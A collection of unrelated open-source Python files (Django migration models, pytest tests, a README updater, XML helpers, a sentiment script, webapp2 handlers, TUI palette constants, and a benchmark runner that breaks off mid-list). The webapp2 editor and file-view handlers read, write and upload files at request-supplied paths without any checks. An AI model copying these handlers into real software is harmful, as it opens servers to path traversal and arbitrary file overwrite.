'storageadmin.smarterrorlog': {
'Meta': {'object_name': 'SMARTErrorLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'line': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.smarterrorlogsummary': {
'Meta': {'object_name': 'SMARTErrorLogSummary'},
'details': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'error_num': ('django.db.models.fields.IntegerField', [], {}),
'etype': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'lifetime_hours': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'storageadmin.smartidentity': {
'Meta': {'object_name': 'SMARTIdentity'},
'assessment': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'ata_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'capacity': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'device_model': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'enabled': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'firmware_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_smartdb': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'model_family': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'rotation_rate': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'sata_version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scanned_on': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'sector_size': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'serial_number': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'supported': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'world_wide_name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'storageadmin.smartinfo': {
'Meta': {'object_name': 'SMARTInfo'},
'disk': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Disk']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'storageadmin.smarttestlog': {
'Meta': {'object_name': 'SMARTTestLog'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'lba_of_first_error': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'lifetime_hours': ('django.db.models.fields.IntegerField', [], {}),
'pct_completed': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'test_num': ('django.db.models.fields.IntegerField', [], {})
},
'storageadmin.smarttestlogdetail': {
'Meta': {'object_name': 'SMARTTestLogDetail'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'line': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.snapshot': {
'Meta': {'unique_together': "(('share', 'name'),)", 'object_name': 'Snapshot'},
'eusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'qgroup': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'real_name': ('django.db.models.fields.CharField', [], {'default': "'unknownsnap'", 'max_length': '4096'}),
'rusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'snap_type': ('django.db.models.fields.CharField', [], {'default': "'admin'", 'max_length': '64'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'uvisible': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'writable': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.supportcase': {
'Meta': {'object_name': 'SupportCase'},
'case_type': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '9'}),
'zipped_log': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'storageadmin.tlscertificate': {
'Meta': {'object_name': 'TLSCertificate'},
'certificate': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12288'})
},
'storageadmin.user': {
'Meta': {'object_name': 'User'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'gid': ('django.db.models.fields.IntegerField', [], {'default': '5000'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Group']", 'null': 'True', 'blank': 'True'}),
'homedir': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True', 'blank': 'True'}),
'shell': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'smb_shares': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_users'", 'null': 'True', 'to': "orm['storageadmin.SambaShare']"}),
'uid': ('django.db.models.fields.IntegerField', [], {'default': '5000'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'suser'", 'unique': 'True', 'null': 'True', 'to': u"orm['auth.User']"}),
'username': ('django.db.models.fields.CharField', [], {'default': "''", 'unique': 'True', 'max_length': '4096'})
}
}
complete_apps = ['storageadmin'] | schakrava/rockstor-core | src/rockstor/storageadmin/south_migrations/0037_auto__chg_field_networkinterface_autoconnect__chg_field_networkinterfa.py | Python | gpl-3.0 | 42,159 |
# -*- coding: utf-8 -*-
import pytest
import networkx
from acopy import Ant
from acopy import Solution
def test_ant_get_unvisited_nodes():
graph = networkx.Graph({0: [1, 2, 3]})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert moves == {1, 2, 3}
def test_ant_get_unvisited_nodes_when_self_edges():
graph = networkx.Graph({0: [0, 1, 2, 3]})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert moves == {1, 2, 3}
def test_ant_get_unvisited_nodes_when_no_edges():
graph = networkx.Graph({0: []})
solution = Solution(graph, start=0)
moves = set(Ant().get_unvisited_nodes(graph, solution))
assert not moves
def test_ant_score_edge():
ant = Ant(alpha=1, beta=1)
score = ant.score_edge({'weight': 1, 'pheromone': 1})
assert score == 1
def test_ant_score_edge_when_no_weight():
ant = Ant(alpha=1, beta=1)
score = ant.score_edge({'pheromone': 1})
assert score == 1
def test_ant_score_edge_when_no_pheromone():
ant = Ant(alpha=1, beta=1)
with pytest.raises(KeyError):
ant.score_edge({'weight': 1})
| rhgrant10/Pants | tests/test_ant.py | Python | gpl-2.0 | 1,186 |
# This is a little script update the README.md file according to the current status of the folder
# Author: Your dear boyfriend/coding genius.
# import module
import os
# update places we have been
def updatePlace():
places = []
for filename in os.listdir("."):
if os.path.isdir(os.path.join(os.path.abspath("."), filename)):
places.append(filename)
result = "# We have been to: " + places[0]
for i in range(1,len(places)-1):
result += ", " + places[i]
result += " and " + places[len(places)-1]
return result + "\n"
# update the date
def updateDate():
import time
return "# Date: " + time.strftime("%m/%d/%Y") + "\n"
# update the total number
def updateTotalNumber():
totalNumber = 0
for stuff in os.listdir("."):
potentialDir = os.path.join(os.path.abspath("."), stuff)
if os.path.isdir(potentialDir):
for filename in os.listdir(potentialDir):
if filename.endswith(".jpg"):
totalNumber += 1
return "# Photos In Total: "+ str(totalNumber) + "\n"
# change a specific line
def replaceLine(line_num, text):
lines = open("README.md", 'r').readlines()
lines[line_num] = text
out = open("README.md", 'w')
out.writelines(lines)
out.close()
# update the file
def updateFile(updatePlaceStr, updateTotalNumberStr, updateDateStr):
replaceLine(1,updatePlaceStr)
replaceLine(2,updateTotalNumberStr)
replaceLine(3,updateDateStr)
# main method
def updateREADME():
updatePlaceStr = updatePlace()
updateTotalNumberStr = updateTotalNumber()
updateDateStr = updateDate()
updateFile(updatePlaceStr, updateTotalNumberStr, updateDateStr)
if __name__ == "__main__":
updateREADME()
| WesleyyC/Lazy-Script | Jo's Flash Drive/updateREADME.py | Python | mit | 1,637 |
from django.utils.encoding import smart_unicode
from django.utils.xmlutils import SimplerXMLGenerator
from rest_framework.compat import StringIO
import re
import xml.etree.ElementTree as ET
# From xml2dict
class XML2Dict(object):
def __init__(self):
pass
def _parse_node(self, node):
node_tree = {}
# Save attrs and text, hope there will not be a child with same name
if node.text:
node_tree = node.text
for (k, v) in node.attrib.items():
k, v = self._namespace_split(k, v)
node_tree[k] = v
#Save childrens
for child in node.getchildren():
tag, tree = self._namespace_split(child.tag, self._parse_node(child))
if tag not in node_tree: # the first time, so store it in dict
node_tree[tag] = tree
continue
old = node_tree[tag]
if not isinstance(old, list):
node_tree.pop(tag)
node_tree[tag] = [old] # multi times, so change old dict to a list
node_tree[tag].append(tree) # add the new one
return node_tree
def _namespace_split(self, tag, value):
"""
Split the tag '{http://cs.sfsu.edu/csc867/myscheduler}patients'
ns = http://cs.sfsu.edu/csc867/myscheduler
name = patients
"""
result = re.compile("\{(.*)\}(.*)").search(tag)
if result:
value.namespace, tag = result.groups()
return (tag, value)
def parse(self, file):
"""parse a xml file to a dict"""
f = open(file, 'r')
return self.fromstring(f.read())
def fromstring(self, s):
"""parse a string"""
t = ET.fromstring(s)
unused_root_tag, root_tree = self._namespace_split(t.tag, self._parse_node(t))
return root_tree
def xml2dict(input):
return XML2Dict().fromstring(input)
# Piston:
class XMLRenderer():
def _to_xml(self, xml, data):
if isinstance(data, (list, tuple)):
for item in data:
xml.startElement("list-item", {})
self._to_xml(xml, item)
xml.endElement("list-item")
elif isinstance(data, dict):
for key, value in data.iteritems():
xml.startElement(key, {})
self._to_xml(xml, value)
xml.endElement(key)
elif data is None:
# Don't output any value
pass
else:
xml.characters(smart_unicode(data))
def dict2xml(self, data):
stream = StringIO.StringIO()
xml = SimplerXMLGenerator(stream, "utf-8")
xml.startDocument()
xml.startElement("root", {})
self._to_xml(xml, data)
xml.endElement("root")
xml.endDocument()
return stream.getvalue()
def dict2xml(input):
return XMLRenderer().dict2xml(input)
| voer-platform/vp.repo | vpr/rest_framework/utils/__init__.py | Python | agpl-3.0 | 2,929 |
# -*- coding: utf-8 -*-
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from unidecode import unidecode
"""
This script uses the NLTK implementation of VADER to get the sentiment
polarities of all the original files with ground truth values.
Data set: http://comp.social.gatech.edu/papers/hutto_ICWSM_2014.tar.gz
Article: http://comp.social.gatech.edu/papers/icwsm14.vader.hutto.pdf
The TSV files created using this script serve as the ground truth for comparing
results of the Java port of the NLTK VADER sentiment analyzer.
"""
sid = SentimentIntensityAnalyzer()
ground_truth_file_list = [
"GroundTruth/tweets_GroundTruth.txt",
"GroundTruth/amazonReviewSnippets_GroundTruth.txt",
"GroundTruth/movieReviewSnippets_GroundTruth.txt",
"GroundTruth/nytEditorialSnippets_GroundTruth.txt"
]
def remove_non_ascii(text):
return unidecode(unicode(text, encoding="utf-8"))
for test_file in ground_truth_file_list:
current_file = test_file.split("/")[1].split(".")[0]
output_filename = current_file + "_vader.tsv"
with open(output_filename, "wb") as csv_file:
with open(test_file, "rb") as tweets:
for line in tweets.readlines():
tweet_id, _, tweet = line.split("\t")
tweet = remove_non_ascii(tweet.strip())
ss = sid.polarity_scores(tweet)
csv_file.write("\t".join([tweet_id, str(ss["neg"]), str(ss["neu"]), str(ss["pos"]), str(ss["compound"]),
tweet.strip()]) + "\n")
print "Created output for ", test_file, "as", output_filename
| nunoachenriques/vader-sentiment-analysis | src/test/resources/getNltkVader.py | Python | apache-2.0 | 1,609 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# Copyright (C) 2014 Brian Douglass bhdouglass@gmail.com
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
### END LICENSE
from agui.aextras.about import AAbout
from agui.aextras.icon import AIcon
from agui.aextras.message import AMessage
from agui.aextras.popup import APopup
from agui.aextras.sound import ASound
from agui.aextras.timeout import ATimeout
| bhdouglass/agui | agui/aextras/__init__.py | Python | gpl-3.0 | 997 |
from WebStudioLib import *
from WebStudioUtil import *
from WebStudioBase import *
from WebStudioApi import *
class PageMainHandler(BaseHandler):
def get(self):
self.render_template('main.html')
class PageTableHandler(BaseHandler):
def get(self):
self.render_template_Vue('table.html')
class PageTaskAnalyzerHandler(BaseHandler):
def get(self):
self.render_template_Vue('task_analyzer.html')
class PageQueueHandler(BaseHandler):
def get(self):
self.render_template_Vue('queue.html')
class PageCliHandler(BaseHandler):
def get(self):
self.render_template('cli.html')
class PageBashHandler(BaseHandler):
def get(self):
self.render_template('bash.html')
class PageEditorHandler(BaseHandler):
def get(self):
params = {}
dir = os.getcwd()
working_dir = self.request.get('working_dir')
file_name = self.request.get('file_name')
if file_name != '':
read_file = open(os.path.join(dir,working_dir, file_name),'r')
content = read_file.read()
read_file.close()
else:
content = ''
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
params['WORKING_DIR'] = working_dir
params['DIR_LIST'] = dir_list
params['CONTENT'] = content
params['FILE_NAME'] = file_name
self.render_template('editor.html',params)
def post(self):
content = self.request.get('content')
dir = os.path.dirname(__file__)
working_dir = self.request.get('working_dir')
file_name = self.request.get('file_name')
if file_name != '':
write_file = open(os.path.join(dir,working_dir, file_name),'w')
write_file.write(content)
write_file.close()
self.response.write("Successfully saved!")
else:
self.response.write("No file opened!")
class PageConfigureHandler(BaseHandler):
def get(self):
self.render_template_Vue('configure.html')
class PageFileViewHandler(BaseHandler):
def get(self):
params = {}
working_dir = self.request.get('working_dir')
root_dir = self.request.get('root_dir')
if root_dir == 'local':
dir = os.path.dirname(GetWebStudioDirPath()+'/local/')
elif root_dir == 'app':
dir = os.path.dirname(os.getcwd()+"/")
elif root_dir == '':
root_dir = 'app'
dir = os.path.dirname(os.getcwd()+"/")
try:
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
except:
self.response.write('Cannot find the specified file path, please check again')
return
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['WORKING_DIR'] = working_dir
params['ROOT_DIR'] = root_dir
params['DIR_LIST'] = dir_list
self.render_template('fileview.html',params)
def post(self):
params = {}
dir = os.path.dirname(os.getcwd()+"/")
working_dir = self.request.get('working_dir')
try:
raw_file = self.request.get('fileToUpload')
file_name = self.request.get('file_name')
savedFile = open(os.path.join(dir,working_dir,file_name),'wb')
savedFile.write(raw_file)
savedFile.close()
params['RESPONSE'] = 'success'
except:
params['RESPONSE'] = 'fail'
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
params['WORKING_DIR'] = working_dir
params['DIR_LIST'] = dir_list
self.render_template('fileview.html',params)
class PageAnalyzerHandler(BaseHandler):
def get(self):
self.render_template_Vue('analyzer.html')
class PageCounterViewHandler(BaseHandler):
def get(self):
self.render_template_Vue('counterview.html')
class PageStoreHandler(BaseHandler):
def get(self):
self.render_template_Vue('store.html')
def post(self):
raw_file = self.request.get('fileToUpload')
file_path = self.request.get('file_path')
raw_icon = self.request.get('iconToUpload')
icon_path = self.request.get('icon_path');
pack_name = self.request.get('file_name');
author = self.request.get('author')
description = self.request.get('description')
schema_info = self.request.get('schema_info')
schema_type = self.request.get('schema_type')
rpc_type = self.request.get('rpc_type')
parameters = self.request.get('parameters')
if_stateful = self.request.get('if_stateful')
#
pack_dir = os.path.join(GetWebStudioDirPath(),'local','packages', pack_name);
if not os.path.exists(pack_dir):
os.makedirs(pack_dir)
# save uploaded package
savedFile = open(os.path.join(GetWebStudioDirPath(),'local','packages', file_path), 'wb')
savedFile.write(raw_file)
savedFile.close()
# save icon file
iconFile = open(os.path.join(pack_dir, icon_path), 'wb')
iconFile.write(raw_icon)
iconFile.close()
# save to db
conn = sqlite3.connect(os.path.join(GetWebStudioDirPath(),'local','data.db'))
c = conn.cursor()
c.execute(TCreate.render({'dataType':'app_package','elems': sqlDataType['app_package']['elems']}))
c.execute(TInsert.render({'dataType':'app_package','val_list':[
pack_name,
author,
description,
schema_info,
schema_type,
rpc_type,
parameters,
if_stateful,
file_path,
icon_path
]}))
conn.commit()
return webapp2.redirect('/store.html')
class PageMulticmdHandler(BaseHandler):
def get(self):
self.render_template_Vue('multicmd.html')
class PageServiceMetaHandler(BaseHandler):
def get(self):
self.render_template_Vue('service_meta.html')
class PageMachineHandler(BaseHandler):
def get(self):
self.render_template_Vue('machine.html')
class PageSettingHandler(BaseHandler):
def get(self):
self.render_template_Vue('setting.html')
| Microsoft/rDSN | src/tools/webstudio/app_package/WebStudioPage.py | Python | mit | 7,573 |
MAIN_LIST_FOCUS = "main_list_focus"
STATUS_BG = "#06a"
STATUS_BG_FOCUS = "#08d"
# name, fg, bg, mono, fg_h, bg_h
PALLETE = [
(MAIN_LIST_FOCUS, 'default', 'brown', "default", "white", "#060"), # a60
('main_list_lg', 'light gray', 'default', "default", "g100", "default"),
('main_list_dg', 'dark gray', 'default', "default", "g78", "default"),
('main_list_ddg', 'dark gray', 'default', "default", "g56", "default"),
('main_list_white', 'white', 'default', "default", "white", "default"),
('main_list_green', 'dark green', 'default', "default", "#0f0", "default"),
('main_list_yellow', 'brown', 'default', "default", "#ff0", "default"),
('main_list_orange', 'light red', 'default', "default", "#fa0", "default"),
('main_list_red', 'dark red', 'default', "default", "#f00", "default"),
('image_names', 'light magenta', 'default', "default", "#F0F", "default"),
('status_box', 'default', 'black', "default", "g100", STATUS_BG),
('status_box_focus', 'default', 'black', "default", "white", STATUS_BG_FOCUS),
('status', 'default', 'default', "default", "default", STATUS_BG),
('status_text', 'default', 'default', "default", "g100", STATUS_BG),
('status_text_green', 'default', 'default', "default", "#0f0", STATUS_BG),
('status_text_yellow', 'default', 'default', "default", "#ff0", STATUS_BG),
('status_text_orange', 'default', 'default', "default", "#f80", STATUS_BG),
('status_text_red', 'default', 'default', "default", "#f66", STATUS_BG),
('notif_error', "white", 'dark red', "default", "white", "#f00",),
('notif_info', 'white', 'default', "default", "g100", "default"),
('notif_important', 'white', 'default', "default", "white", "default"),
('notif_text_green', 'white', 'default', "white", "#0f0", "default"),
('notif_text_yellow', 'white', 'default', "white", "#ff0", "default"),
('notif_text_orange', 'white', 'default', "white", "#f80", "default"),
('notif_text_red', 'white', 'default', "white", "#f66", "default"),
('tree', 'dark green', 'default', "default", "dark green", "default"),
('graph_bg', "default", 'default', "default", "default", "default"),
('graph_lines_cpu', "default", 'default', "default", "default", "#d63"),
('graph_lines_cpu_tips', "default", 'default', "default", "#d63", "default"),
('graph_lines_cpu_legend', "default", 'default', "default", "#f96", "default"),
('graph_lines_mem', "default", 'default', "default", "default", "#39f"),
('graph_lines_mem_tips', "default", 'default', "default", "#39f", "default"),
('graph_lines_mem_legend', "default", 'default', "default", "#6af", "default"),
('graph_lines_blkio_r', "default", 'default', "default", "default", "#9b0"),
('graph_lines_blkio_r_tips', "default", 'default', "default", "#9b0", "default"),
('graph_lines_blkio_r_legend', "default", 'default', "default", "#cf0", "default"),
('graph_lines_blkio_w', "default", 'default', "default", "default", "#b90"),
('graph_lines_blkio_w_tips', "default", 'default', "default", "#b90", "default"),
('graph_lines_blkio_w_legend', "default", 'default', "default", "#fc0", "default"),
('graph_lines_net_r', "default", 'default', "default", "default", "#3ca"),
('graph_lines_net_r_tips', "default", 'default', "default", "#3ca", "default"),
('graph_lines_net_r_legend', "default", 'default', "default", "#6fc", "default"),
('graph_lines_net_w', "default", 'default', "default", "default", "#3ac"),
('graph_lines_net_w_tips', "default", 'default', "default", "#3ac", "default"),
('graph_lines_net_w_legend', "default", 'default', "default", "#6cf", "default"),
]
STATUS_BAR_REFRESH_SECONDS = 5
CLEAR_NOTIF_BAR_MESSAGE_IN = 5
# FIXME: generate dynamically now
HELP_TEXT = """\
# Keybindings
Since I am a heavy `vim` user, these keybindings are trying to stay close to vim.
## Global
/ search (provide empty query to disable searching)
n next search occurrence
N previous search occurrence
f4 display only lines matching provided query (provide empty query to clear filtering)
* main listing provides additional filtering (for more info, check Listing Section)
* example query: "fed" - display lines containing string "fed"
f5 open a tree view of all images (`docker images --tree` equivalent)
ctrl o next buffer
ctrl i previous buffer
x remove buffer
ctrl l redraw user interface
h, ? show help
## Movement
gg go to first item
G go to last item
j go one line down
k go one line up
pg up
ctrl u go 10 lines up
pg down
ctrl d go 10 lines down
## Listing
@ refresh listing
f4 display only lines matching provided query (provide empty query to clear filtering)
* space-separated list of query strings, currently supported filters are:
* t[ype]=c[ontainer[s]]
* t[ype]=i[mage[s]]
* s[tate]=r[unning])
example query may be:
* "type=container" - show only containers (short equivalent is "t=c")
* "type=image fedora" - show images with string "fedora" in name (equivalent "t=i fedora")
## Image commands in listing
i inspect image
d remove image (irreversible!)
enter display detailed info about image (when layer is focused)
## Container commands in listing
i inspect container
l display logs of container
f follow logs of container
d remove container (irreversible!)
t stop container
s start container
r restart container
p pause container
u unpause container
X kill container
! toggle realtime updates of the interface (this is useful when you are removing multiple
objects and don't want the listing change during that so you accidentally remove something)
## Tree buffer
enter display detailed info about image (opens image info buffer)
## Image info buffer
d remove image tag (when image name is focused)
enter display detailed info about image (when layer is focused)
i inspect image (when layer is focused)
"""
| f-cap/sen | sen/tui/constants.py | Python | mit | 6,074 |
import math, os, shutil, subprocess
import runner
from runner import RunnerCore, path_from_root
from tools.shared import *
# standard arguments for timing:
# 0: no runtime, just startup
# 1: very little runtime
# 2: 0.5 seconds
# 3: 1 second
# 4: 5 seconds
# 5: 10 seconds
DEFAULT_ARG = '4'
TEST_REPS = 2
CORE_BENCHMARKS = True # core benchmarks vs full regression suite
class Benchmarker:
def __init__(self, name):
self.name = name
def bench(self, args, output_parser=None, reps=TEST_REPS):
self.times = []
self.reps = reps
for i in range(reps):
start = time.time()
output = self.run(args)
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(output)
self.times.append(curr)
def display(self, baseline=None):
if baseline == self: baseline = None
mean = sum(self.times)/len(self.times)
squared_times = map(lambda x: x*x, self.times)
mean_of_squared = sum(squared_times)/len(self.times)
std = math.sqrt(mean_of_squared - mean*mean)
sorted_times = self.times[:]
sorted_times.sort()
median = sum(sorted_times[len(sorted_times)/2 - 1:len(sorted_times)/2 + 1])/2
print ' %10s: mean: %4.3f (+-%4.3f) secs median: %4.3f range: %4.3f-%4.3f (noise: %4.3f%%) (%d runs)' % (self.name, mean, std, median, min(self.times), max(self.times), 100*std/mean, self.reps),
if baseline:
mean_baseline = sum(baseline.times)/len(baseline.times)
final = mean / mean_baseline
print ' Relative: %.2f X slower' % final
else:
print
class NativeBenchmarker(Benchmarker):
def __init__(self, name, cc, cxx, args=['-O2']):
self.name = name
self.cc = cc
self.cxx = cxx
self.args = args
def build(self, parent, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder):
self.parent = parent
if lib_builder: native_args = native_args + lib_builder(self.name, native=True, env_init={ 'CC': self.cc, 'CXX': self.cxx })
if not native_exec:
compiler = self.cxx if filename.endswith('cpp') else self.cc
process = Popen([compiler, '-fno-math-errno', filename, '-o', filename+'.native'] + self.args + shared_args + native_args, stdout=PIPE, stderr=parent.stderr_redirect)
output = process.communicate()
if process.returncode is not 0:
print >> sys.stderr, "Building native executable with command failed"
print "Output: " + output[0]
else:
shutil.copyfile(native_exec, filename + '.native')
shutil.copymode(native_exec, filename + '.native')
final = os.path.dirname(filename) + os.path.sep + self.name+'_' + os.path.basename(filename) + '.native'
shutil.move(filename + '.native', final)
self.filename = final
def run(self, args):
process = Popen([self.filename] + args, stdout=PIPE, stderr=PIPE)
return process.communicate()[0]
class JSBenchmarker(Benchmarker):
def __init__(self, name, engine, extra_args=[], env={}):
self.name = name
self.engine = engine
self.extra_args = extra_args
self.env = os.environ.copy()
for k, v in env.iteritems():
self.env[k] = v
def build(self, parent, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder):
self.filename = filename
llvm_root = self.env.get('LLVM') or LLVM_ROOT
if lib_builder: emcc_args = emcc_args + lib_builder('js_' + llvm_root, native=False, env_init=self.env)
open('hardcode.py', 'w').write('''
def process(filename):
js = open(filename).read()
replaced = js.replace("run();", "run(%s.concat(Module[\\"arguments\\"]));")
assert js != replaced
open(filename, 'w').write(replaced)
import sys
process(sys.argv[1])
''' % str(args[:-1]) # do not hardcode in the last argument, the default arg
)
final = os.path.dirname(filename) + os.path.sep + self.name+'_' + os.path.basename(filename) + '.js'
try_delete(final)
output = Popen([PYTHON, EMCC, filename, #'-O3',
'-O3', '-s', 'DOUBLE_MODE=0', '-s', 'PRECISE_I64_MATH=0',
'--memory-init-file', '0', '--js-transform', 'python hardcode.py',
'-s', 'TOTAL_MEMORY=128*1024*1024',
#'--profiling',
#'--closure', '1',
'-o', final] + shared_args + emcc_args + self.extra_args, stdout=PIPE, stderr=PIPE, env=self.env).communicate()
assert os.path.exists(final), 'Failed to compile file: ' + output[0]
self.filename = final
def run(self, args):
return run_js(self.filename, engine=self.engine, args=args, stderr=PIPE, full_output=True, assert_returncode=None)
# Benchmarkers
try:
default_native = LLVM_3_2
default_native_name = 'clang-3.2'
except:
if 'benchmark' in str(sys.argv):
print 'LLVM_3_2 not defined, using our LLVM instead (%s)' % LLVM_ROOT
default_native = LLVM_ROOT
default_native_name = 'clang'
try:
benchmarkers_error = ''
benchmarkers = [
#NativeBenchmarker('clang', CLANG_CC, CLANG),
NativeBenchmarker(default_native_name, os.path.join(default_native, 'clang'), os.path.join(default_native, 'clang++')),
#NativeBenchmarker('clang-3.2-O3', os.path.join(default_native, 'clang'), os.path.join(default_native, 'clang++'), ['-O3']),
#NativeBenchmarker('clang-3.3', os.path.join(LLVM_3_3, 'clang'), os.path.join(LLVM_3_3, 'clang++')),
#NativeBenchmarker('clang-3.4', os.path.join(LLVM_3_4, 'clang'), os.path.join(LLVM_3_4, 'clang++')),
#NativeBenchmarker('gcc', 'gcc', 'g++'),
JSBenchmarker('sm-f32', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2']),
#JSBenchmarker('sm-f32-si', SPIDERMONKEY_ENGINE, ['--profiling', '-s', 'PRECISE_F32=2', '-s', 'SIMPLIFY_IFS=1']),
#JSBenchmarker('sm-f32-aggro', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1']),
#JSBenchmarker('sm-f32-3.2', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_2 }),
#JSBenchmarker('sm-f32-3.3', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_3 }),
#JSBenchmarker('sm-f32-3.4', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_4 }),
#JSBenchmarker('sm-noasm', SPIDERMONKEY_ENGINE + ['--no-asmjs']),
#JSBenchmarker('sm-noasm-f32', SPIDERMONKEY_ENGINE + ['--no-asmjs'], ['-s', 'PRECISE_F32=2']),
#JSBenchmarker('v8', V8_ENGINE),
